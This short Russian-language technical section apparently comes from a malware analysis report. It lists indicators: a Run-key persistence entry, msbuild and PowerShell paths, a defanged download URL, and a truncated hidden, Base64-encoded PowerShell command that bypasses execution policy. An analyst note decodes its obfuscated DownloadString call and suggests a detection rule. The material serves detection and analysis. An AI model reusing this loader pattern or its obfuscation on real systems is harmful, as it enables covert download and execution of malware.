Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'NewApp' = '%APPDATA%\NewApp\NewApp.exe'
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- %WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe
- %APPDATA%\newapp\newapp.exe
- %APPDATA%\newapp\newapp.exe
- http://pa##e.ee/r/RF2Ub
- DNS ASK pa##e.ee
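- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -w 1 /e JABVAGcAaABnACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8Aa...
  Примечание: -ExecutionPolicy bypass снимает ограничения политики выполнения для этого запуска, -w 1 задаёт скрытое окно, /e — сокращение от -EncodedCommand (Base64 от текста в кодировке UTF-16LE). Аргумент приведён не полностью (обрезан на «...»). Видимое начало декодируется как $Ughg = ('{2}{0}{1}{3}'-f'dSt','rin',“`D`o`w`n`l`oa”,'g');[vo — имя метода DownloadString собирается из фрагментов оператором форматирования, чтобы его не находил поиск по строкам. По-видимому, это связано с сетевым обращением к pa##e.ee, указанным выше. Для обнаружения полезно отслеживать запуски powershell.exe со скрытым окном и закодированной командой.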
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'